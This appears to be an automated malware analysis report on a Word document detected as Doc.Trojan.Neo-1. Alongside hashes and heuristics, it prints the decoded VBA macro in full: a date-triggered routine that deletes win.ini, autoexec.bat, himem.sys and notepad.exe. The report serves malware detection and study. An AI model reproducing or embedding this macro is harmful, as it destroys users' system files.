Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5c6504eb3a5553a3…

MALICIOUS

Office (OLE)

26.0 KB
Created: 1999-05-30 01:01:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: be2d07330c9689269d80f8e8108122d8
SHA-1: c52b4179804a22f50f99b99b5adf11a0ce563303
SHA-256: 5c6504eb3a5553a365db0de0e857aca314414bf45436c9fd3f09180986f61633
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros. The 'Form_Load' subroutine in the macros attempts to delete several critical system files, including 'c:\windows\win.ini', 'c:\autoexec.bat', 'c:\windows\himem.sys', and 'c:\windows\notepad.exe'. This behavior indicates a destructive payload of the kind commonly associated with wipers.

Heuristics (2)

  • ClamAV: Doc.Trojan.Neo-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Neo-1
  • VBA macros detected (medium, OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 744 bytes
SHA-256: fcec8c8f72db10aa8687c8134eafff21d9bf441ce5640f9abf505fabf56b5b13
Detection
ClamAV: Doc.Trojan.Neo-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Form_Load()
form1.Hide
If Date$ > "07-04-2000" Then GoTo del Else
If Year(Now) > 1999 Then End
Else
Date$ = "05-30-1999"
End
del:
file1 = "c:\windows\win.ini"
file2 = "c:\autoexec.bat"
file3 = "c:\windows\himem.sys"
file4 = "c:\windows\notepad.exe"
file5 = "c:\"
On Error Resume Next
SetAttr file1, 0
SetAttr file2, 0
SetAttr file3, 0
SetAttr file4, 0
SetAttr file5, 0
Kill file1
Kill file2
Kill file3
Kill file4
Kill file5
End
'The Chaos Virus
'By: Neo
End Sub